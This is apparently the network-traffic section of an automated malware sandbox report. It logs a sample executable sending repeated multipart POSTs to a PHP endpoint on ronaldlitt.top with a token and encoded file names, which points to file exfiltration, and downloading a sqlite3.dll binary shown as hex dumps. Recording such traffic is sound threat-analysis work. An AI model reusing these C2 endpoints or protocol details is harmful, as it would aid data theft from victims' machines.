May 28, 2023 09:29:48.232814074 CEST	1484	OUT	POST /25d4fc7fb0cb6b78.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GDBFBFCBFBKECAAKJKFB Host: ronaldlitt.top Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
May 28, 2023 09:29:48.232891083 CEST	1485	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 44 42 46 42 46 43 42 46 42 4b 45 43 41 41 4b 4a 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 31 33 38 64 34 Data Ascii: ------GDBFBFCBFBKECAAKJKFBContent-Disposition: form-data; name="token"7138d4594e670d891c235db33d5230b05ea0173fd1489c6ee431893fde88e49579e17ef5------GDBFBFCBFBKECAAKJKFBContent-Disposition: form-data; name="file_name"ZmlsZXNcRE9DU
May 28, 2023 09:29:48.321027040 CEST	1486	IN	HTTP/1.1 200 OK Date: Sun, 28 May 2023 07:29:48 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
33	192.168.2.5	49744	193.106.175.215	80	C:\Users\user\Desktop\un78exGoa4.exe

Timestamp	kBytes transferred	Direction	Data
May 28, 2023 09:29:48.395708084 CEST	1486	OUT	POST /25d4fc7fb0cb6b78.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CAFHIJDHDGDBFHIEHDGI Host: ronaldlitt.top Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
May 28, 2023 09:29:48.395772934 CEST	1488	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 41 46 48 49 4a 44 48 44 47 44 42 46 48 49 45 48 44 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 31 33 38 64 34 Data Ascii: ------CAFHIJDHDGDBFHIEHDGIContent-Disposition: form-data; name="token"7138d4594e670d891c235db33d5230b05ea0173fd1489c6ee431893fde88e49579e17ef5------CAFHIJDHDGDBFHIEHDGIContent-Disposition: form-data; name="file_name"ZmlsZXNcRE9DU
May 28, 2023 09:29:48.511517048 CEST	1489	IN	HTTP/1.1 200 OK Date: Sun, 28 May 2023 07:29:48 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
34	192.168.2.5	49745	193.106.175.215	80	C:\Users\user\Desktop\un78exGoa4.exe

Timestamp	kBytes transferred	Direction	Data
May 28, 2023 09:29:48.581904888 CEST	1489	OUT	POST /25d4fc7fb0cb6b78.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JJDBGDHIIDAEBFHJJDBF Host: ronaldlitt.top Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
May 28, 2023 09:29:48.581975937 CEST	1491	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4a 4a 44 42 47 44 48 49 49 44 41 45 42 46 48 4a 4a 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 31 33 38 64 34 Data Ascii: ------JJDBGDHIIDAEBFHJJDBFContent-Disposition: form-data; name="token"7138d4594e670d891c235db33d5230b05ea0173fd1489c6ee431893fde88e49579e17ef5------JJDBGDHIIDAEBFHJJDBFContent-Disposition: form-data; name="file_name"ZmlsZXNcRE9DU
May 28, 2023 09:29:48.674067020 CEST	1491	IN	HTTP/1.1 200 OK Date: Sun, 28 May 2023 07:29:48 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
35	192.168.2.5	49746	193.106.175.215	80	C:\Users\user\Desktop\un78exGoa4.exe

Timestamp	kBytes transferred	Direction	Data
May 28, 2023 09:29:48.741959095 CEST	1492	OUT	POST /25d4fc7fb0cb6b78.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CBFBKFIDHIDGHJKFBGHC Host: ronaldlitt.top Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
May 28, 2023 09:29:48.742017984 CEST	1494	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 42 46 42 4b 46 49 44 48 49 44 47 48 4a 4b 46 42 47 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 31 33 38 64 34 Data Ascii: ------CBFBKFIDHIDGHJKFBGHCContent-Disposition: form-data; name="token"7138d4594e670d891c235db33d5230b05ea0173fd1489c6ee431893fde88e49579e17ef5------CBFBKFIDHIDGHJKFBGHCContent-Disposition: form-data; name="file_name"ZmlsZXNcRE9DU
May 28, 2023 09:29:48.834235907 CEST	1494	IN	HTTP/1.1 200 OK Date: Sun, 28 May 2023 07:29:48 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
36	192.168.2.5	49747	193.106.175.215	80	C:\Users\user\Desktop\un78exGoa4.exe

Timestamp	kBytes transferred	Direction	Data
May 28, 2023 09:29:48.901222944 CEST	1495	OUT	POST /25d4fc7fb0cb6b78.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JJJDGIECFCAKKFHIIIJE Host: ronaldlitt.top Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
May 28, 2023 09:29:48.901295900 CEST	1496	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4a 44 47 49 45 43 46 43 41 4b 4b 46 48 49 49 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 31 33 38 64 34 Data Ascii: ------JJJDGIECFCAKKFHIIIJEContent-Disposition: form-data; name="token"7138d4594e670d891c235db33d5230b05ea0173fd1489c6ee431893fde88e49579e17ef5------JJJDGIECFCAKKFHIIIJEContent-Disposition: form-data; name="file_name"ZmlsZXNcRE9DU
May 28, 2023 09:29:49.000083923 CEST	1497	IN	HTTP/1.1 200 OK Date: Sun, 28 May 2023 07:29:48 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
37	192.168.2.5	49748	193.106.175.215	80	C:\Users\user\Desktop\un78exGoa4.exe

Timestamp	kBytes transferred	Direction	Data
May 28, 2023 09:29:49.074559927 CEST	1497	OUT	POST /25d4fc7fb0cb6b78.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BGDAAKJJDAAKFHJKJKFC Host: ronaldlitt.top Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
May 28, 2023 09:29:49.074559927 CEST	1499	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 47 44 41 41 4b 4a 4a 44 41 41 4b 46 48 4a 4b 4a 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 31 33 38 64 34 Data Ascii: ------BGDAAKJJDAAKFHJKJKFCContent-Disposition: form-data; name="token"7138d4594e670d891c235db33d5230b05ea0173fd1489c6ee431893fde88e49579e17ef5------BGDAAKJJDAAKFHJKJKFCContent-Disposition: form-data; name="file_name"ZmlsZXNcRE9DU
May 28, 2023 09:29:49.186847925 CEST	1499	IN	HTTP/1.1 200 OK Date: Sun, 28 May 2023 07:29:49 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
38	192.168.2.5	49749	193.106.175.215	80	C:\Users\user\Desktop\un78exGoa4.exe

Timestamp	kBytes transferred	Direction	Data
May 28, 2023 09:29:49.298521042 CEST	1500	OUT	POST /25d4fc7fb0cb6b78.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GDBFBFCBFBKECAAKJKFB Host: ronaldlitt.top Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
May 28, 2023 09:29:49.298594952 CEST	1502	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 44 42 46 42 46 43 42 46 42 4b 45 43 41 41 4b 4a 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 31 33 38 64 34 Data Ascii: ------GDBFBFCBFBKECAAKJKFBContent-Disposition: form-data; name="token"7138d4594e670d891c235db33d5230b05ea0173fd1489c6ee431893fde88e49579e17ef5------GDBFBFCBFBKECAAKJKFBContent-Disposition: form-data; name="file_name"ZmlsZXNcRE9DU
May 28, 2023 09:29:49.419622898 CEST	1502	IN	HTTP/1.1 200 OK Date: Sun, 28 May 2023 07:29:49 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
39	192.168.2.5	49750	193.106.175.215	80	C:\Users\user\Desktop\un78exGoa4.exe

Timestamp	kBytes transferred	Direction	Data
May 28, 2023 09:29:49.489388943 CEST	1503	OUT	POST /25d4fc7fb0cb6b78.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FCFIJEBFCGDAAKFHIDBF Host: ronaldlitt.top Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
May 28, 2023 09:29:49.489531040 CEST	1505	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 46 43 46 49 4a 45 42 46 43 47 44 41 41 4b 46 48 49 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 31 33 38 64 34 Data Ascii: ------FCFIJEBFCGDAAKFHIDBFContent-Disposition: form-data; name="token"7138d4594e670d891c235db33d5230b05ea0173fd1489c6ee431893fde88e49579e17ef5------FCFIJEBFCGDAAKFHIDBFContent-Disposition: form-data; name="file_name"ZmlsZXNcRE9DU
May 28, 2023 09:29:49.606952906 CEST	1505	IN	HTTP/1.1 200 OK Date: Sun, 28 May 2023 07:29:49 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.5	49715	193.106.175.215	80	C:\Users\user\Desktop\un78exGoa4.exe

Timestamp	kBytes transferred	Direction	Data
May 28, 2023 09:29:41.472238064 CEST	124	OUT	GET /3abdf8b5527012d0/sqlite3.dll HTTP/1.1 Host: ronaldlitt.top Cache-Control: no-cache
May 28, 2023 09:29:41.542838097 CEST	125	IN	HTTP/1.1 200 OK Date: Sun, 28 May 2023 07:29:41 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT ETag: "10e436-5e7ec6832a180" Accept-Ranges: bytes Content-Length: 1106998 Connection: close Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00 2e 00 00 00 14 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 35 37 00 00 00 00 00 5c 0b 00 00 00 c0 0e 00 00 0c 00 00 00 42 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 37 30 00 00 00 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: 0@< .text%&`P`.data\|'@(,@`.rdatapDpFT@`@.bss(`.edata,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70#N@
May 28, 2023 09:29:41.542870998 CEST	126	IN	Data Raw: 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 50 03 00 00 00 20 0f 00 00 04 00 00 00 8e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 Data Ascii: B/81s:<R@B/92P @B
May 28, 2023 09:29:41.542895079 CEST	128	IN	Data Raw: 26 00 00 00 00 e8 2b e9 0a 00 8d 43 ff 89 7c 24 08 89 5c 24 04 89 34 24 83 f8 01 77 8c e8 23 fd ff ff 83 ec 0c 85 c0 74 bf 89 7c 24 08 89 5c 24 04 89 34 24 e8 ac f6 0a 00 83 ec 0c 85 c0 89 c5 75 23 83 fb 01 75 a1 89 7c 24 08 c7 44 24 04 00 00 00 Data Ascii: &+C\|$\$4$w#t\|$\$4$u#u\|$D$4$t&up\|$D$4$rZ\|$D$4$Q\|$D$4$*\|$D$4$s\|$D$4$
May 28, 2023 09:29:41.542913914 CEST	129	IN	Data Raw: 04 0f b6 42 14 5d c3 55 31 c0 89 e5 8b 55 08 85 d2 74 03 8b 42 10 5d c3 55 31 c0 89 e5 8b 55 08 85 d2 74 11 8b 4a 10 85 c9 74 0a 8b 42 04 c6 04 08 00 8b 42 04 5d c3 8b 10 8d 4a 01 89 08 0f b6 12 81 fa bf 00 00 00 76 59 55 0f b6 92 40 9e ec 61 89 Data Ascii: B]U1UtB]U1UtJtBB]JvYU@aSuK?v"%=t=D[]USI1t9sAvuA@[] gatU$
May 28, 2023 09:29:41.543560982 CEST	130	IN	Data Raw: c7 42 04 00 00 00 00 b0 02 c1 e3 07 09 cb 89 1a e9 4c 01 00 00 0f b6 70 02 0f b6 db c1 e3 0e 09 f3 f6 c3 80 75 1e 83 e1 7f 81 e3 7f c0 1f 00 c7 42 04 00 00 00 00 c1 e1 07 b0 03 09 cb 89 1a e9 1d 01 00 00 0f b6 70 03 0f b6 c9 81 e3 7f c0 1f 00 c1 Data Ascii: BLpuBpuBxMMuMZ2Mx]uZxu
May 28, 2023 09:29:41.543591976 CEST	132	IN	Data Raw: ec 1c 8b 45 08 8b 75 10 8b 7d 0c 8b 58 04 8b 43 1c 89 04 24 e8 33 f5 ff ff 39 73 04 7c 0f 7f 04 39 3b 72 09 89 73 04 89 3b 31 f6 eb 05 be 0b 00 00 00 8b 43 1c 89 04 24 e8 37 f5 ff ff 83 c4 1c 89 f0 5b 5e 5f 5d c3 55 89 e5 53 83 ec 14 8b 45 08 8b Data Ascii: Eu}XC$39s\|9;rs;1C$7[^_]USEXC$MSCQ$1[]U1WVS}U9Wt_C$}~%C$uSE{,uBC,1u~C, {,uC(
May 28, 2023 09:29:41.543627024 CEST	133	IN	Data Raw: 83 c4 24 5b 5d c3 55 89 e5 53 8d 4d d4 83 ec 30 8b 5a 18 39 58 18 73 15 89 41 10 8b 58 10 85 db 74 06 89 c1 89 d8 eb e8 89 50 10 eb 13 89 51 10 8b 5a 10 85 db 74 06 89 d1 89 da eb d3 89 42 10 8b 45 e4 83 c4 30 5b 5d c3 55 89 e5 56 53 89 c6 83 ec Data Ascii: $[]USM0Z9XsAXtPQZtBE0[]UVS01tB@ td\$\$$T$[^]HPUJHQP@J,]UE]@0U1WVMSEu]y4A89tBV1
May 28, 2023 09:29:41.543821096 CEST	135	IN	Data Raw: 0e 66 83 78 28 00 78 07 8b 40 48 85 c0 75 58 8b 43 40 83 38 00 74 4c 8d 55 e0 c7 45 e0 00 00 00 00 c7 45 e4 00 00 00 00 e8 18 e9 ff ff 85 c0 75 4b 8b b3 a8 00 00 00 8b bb ac 00 00 00 89 f0 03 45 e0 89 fa 13 55 e4 89 74 24 08 89 7c 24 0c 83 c0 ff Data Ascii: fx(x@HuXC@8tLUEEuKEUt$\|$$T$1;vM1<[^_]Uxxuty+tP@]US@@<$C[]UE]fa1UWVSSxMtDp;FPt
May 28, 2023 09:29:41.543842077 CEST	136	IN	Data Raw: 83 c4 1c 5b 5e 5f 5d c3 8b 45 ec 83 c4 1c 5b 5e 5f 5d e9 e0 fc ff ff 55 89 e5 57 56 8b 7d 08 53 0f b6 4f 0a 03 4d 0c 0f b6 01 83 f8 7f 76 1b 8d 71 08 83 e0 7f 41 8a 19 c1 e0 07 89 da 83 e2 7f 09 d0 39 ce 76 04 84 db 78 eb 0f b7 77 0e 41 39 f0 77 Data Ascii: [^_]E[^_]UWV}SOMvqA9vxwA9w+MF$W4_z(1)9B+MD[^_]UUBJ@xy9w)]UWVSQ]Uv{FEE9vx~NyC~Ny:~
May 28, 2023 09:29:41.543984890 CEST	137	IN	Data Raw: d1 e8 eb 07 0f b6 80 60 98 ec 61 5d c3 55 89 e5 57 56 89 c7 89 d6 83 ec 08 83 fa 0b 0f 87 07 01 00 00 ff 24 95 54 70 eb 61 66 c7 41 10 01 04 c7 41 0c 00 00 00 00 c7 01 00 00 00 00 e9 02 01 00 00 66 c7 41 10 01 00 e9 f7 00 00 00 0f be 00 eb 0c 0f Data Ascii: `a]UWV$TpafAAfAWQfAfW@GW7W@11E}EUQw
May 28, 2023 09:29:41.606288910 CEST	139	IN	Data Raw: e5 8b 45 08 ff 40 10 31 c0 5d c3 55 89 e5 8b 45 08 ff 48 10 5d c3 55 31 c0 89 e5 5d c3 55 89 e5 8b 45 0c 80 38 a8 75 09 8b 55 08 8b 52 18 00 50 02 31 c0 5d c3 55 0f bf 50 20 8b 40 2c 89 e5 f6 40 1c 60 74 36 89 d1 c1 e1 04 03 48 04 f6 41 0e 60 74 Data Ascii: E@1]UEH]U1]UE8uURP1]UP @,@`t6HA`t(fH"f?511 ??N11 ]Ut@ t@]Ut P tt@@@]UuHuB

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
40	192.168.2.5	49751	193.106.175.215	80	C:\Users\user\Desktop\un78exGoa4.exe

Timestamp	kBytes transferred	Direction	Data
May 28, 2023 09:29:49.696847916 CEST	1505	OUT	POST /25d4fc7fb0cb6b78.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IJKFCFHJDBKKFHIEHIDG Host: ronaldlitt.top Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
May 28, 2023 09:29:49.696989059 CEST	1507	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 49 4a 4b 46 43 46 48 4a 44 42 4b 4b 46 48 49 45 48 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 31 33 38 64 34 Data Ascii: ------IJKFCFHJDBKKFHIEHIDGContent-Disposition: form-data; name="token"7138d4594e670d891c235db33d5230b05ea0173fd1489c6ee431893fde88e49579e17ef5------IJKFCFHJDBKKFHIEHIDGContent-Disposition: form-data; name="file_name"ZmlsZXNcRE9DU
May 28, 2023 09:29:49.792155027 CEST	1508	IN	HTTP/1.1 200 OK Date: Sun, 28 May 2023 07:29:49 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
41	192.168.2.5	49752	193.106.175.215	80	C:\Users\user\Desktop\un78exGoa4.exe

Timestamp	kBytes transferred	Direction	Data
May 28, 2023 09:29:49.864597082 CEST	1508	OUT	POST /25d4fc7fb0cb6b78.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GHCGDAFCFHIDBGDHCFCB Host: ronaldlitt.top Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
May 28, 2023 09:29:49.864656925 CEST	1510	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 48 43 47 44 41 46 43 46 48 49 44 42 47 44 48 43 46 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 31 33 38 64 34 Data Ascii: ------GHCGDAFCFHIDBGDHCFCBContent-Disposition: form-data; name="token"7138d4594e670d891c235db33d5230b05ea0173fd1489c6ee431893fde88e49579e17ef5------GHCGDAFCFHIDBGDHCFCBContent-Disposition: form-data; name="file_name"ZmlsZXNcUkVDT
May 28, 2023 09:29:49.956094980 CEST	1510	IN	HTTP/1.1 200 OK Date: Sun, 28 May 2023 07:29:49 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
42	192.168.2.5	49753	193.106.175.215	80	C:\Users\user\Desktop\un78exGoa4.exe

Timestamp	kBytes transferred	Direction	Data
May 28, 2023 09:29:50.035825968 CEST	1511	OUT	POST /25d4fc7fb0cb6b78.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EBAFBGIDHCBFHIECFCBG Host: ronaldlitt.top Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
May 28, 2023 09:29:50.035960913 CEST	1513	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 31 33 38 64 34 Data Ascii: ------EBAFBGIDHCBFHIECFCBGContent-Disposition: form-data; name="token"7138d4594e670d891c235db33d5230b05ea0173fd1489c6ee431893fde88e49579e17ef5------EBAFBGIDHCBFHIECFCBGContent-Disposition: form-data; name="file_name"ZmlsZXNcUkVDT
May 28, 2023 09:29:50.135049105 CEST	1513	IN	HTTP/1.1 200 OK Date: Sun, 28 May 2023 07:29:50 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
43	192.168.2.5	49754	193.106.175.215	80	C:\Users\user\Desktop\un78exGoa4.exe

Timestamp	kBytes transferred	Direction	Data
May 28, 2023 09:29:50.201864004 CEST	1514	OUT	POST /25d4fc7fb0cb6b78.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BKKKEGIDBGHIDGDHDBFH Host: ronaldlitt.top Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
May 28, 2023 09:29:50.201924086 CEST	1515	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 4b 4b 4b 45 47 49 44 42 47 48 49 44 47 44 48 44 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 31 33 38 64 34 Data Ascii: ------BKKKEGIDBGHIDGDHDBFHContent-Disposition: form-data; name="token"7138d4594e670d891c235db33d5230b05ea0173fd1489c6ee431893fde88e49579e17ef5------BKKKEGIDBGHIDGDHDBFHContent-Disposition: form-data; name="file_name"ZmlsZXNcUkVDT
May 28, 2023 09:29:50.317609072 CEST	1516	IN	HTTP/1.1 200 OK Date: Sun, 28 May 2023 07:29:50 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
44	192.168.2.5	49755	193.106.175.215	80	C:\Users\user\Desktop\un78exGoa4.exe

Timestamp	kBytes transferred	Direction	Data
May 28, 2023 09:29:50.395343065 CEST	1516	OUT	POST /25d4fc7fb0cb6b78.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CAFHIJDHDGDBFHIEHDGI Host: ronaldlitt.top Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
May 28, 2023 09:29:50.395420074 CEST	1518	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 41 46 48 49 4a 44 48 44 47 44 42 46 48 49 45 48 44 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 31 33 38 64 34 Data Ascii: ------CAFHIJDHDGDBFHIEHDGIContent-Disposition: form-data; name="token"7138d4594e670d891c235db33d5230b05ea0173fd1489c6ee431893fde88e49579e17ef5------CAFHIJDHDGDBFHIEHDGIContent-Disposition: form-data; name="file_name"ZmlsZXNcUkVDT
